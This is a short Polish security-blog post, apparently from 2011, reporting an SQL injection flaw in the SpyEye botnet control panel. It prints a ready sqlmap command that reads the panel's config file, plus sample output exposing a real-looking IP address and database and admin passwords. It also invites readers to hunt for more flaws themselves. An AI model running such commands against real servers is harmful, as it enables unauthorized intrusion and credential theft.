12:46
5/5/2011

* SpyEye SQL injection

Nawet oprogramowanie wykorzystujące dziury ma swoje dziury :] Jeden z parametrów w panelu zarządzania SpyEye jest podatny na ataki SQL injection. Aby przy pomocy tego błędu wydobyć plik konfiguracyjny botnetu, można użyć sqlmapa z poniższymi parametrami:

./sqlmap.py -u"http://x.x.x.x/formgrab/frm_findrep_sub2.php?id=1" --file-read=/var/www/formgrab/config.php

Wynik będzie podobny do tego:

cat output/76.73.17.90/files/_var_www_s3_fr3
<?php
# Database
define('DB_SERVER', 'localhost');
define('DB_NAME', 'fra');
define('DB_USER', 'root');
define('DB_PASSWORD', '1234TTab123xsdesd568');
# Admin
define('ADMIN_PASSWORD', 'hdjsd898oiSDKfsdf32423ncc');
?>

Podatność opublikował quantumbenxh, który niezbyt uważnie usunął adres IP zainfekowanego hosta. W jego poście znajdziecie też panel SpyEye — można poszukać kolejnych SQL injections [i innych błędów] na własną rękę.

Przeczytaj także:

Ten wpis pochodzi z naszego linkbloga *ptr, dlatego nie widać go na głównej.
*ptr możesz czytać przez RSS albo przez sidebar po prawej stronie serwisu.


1 komentarz

Dodaj komentarz
  1. do bani, avast blokuje mi pobranie sqlmapa

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: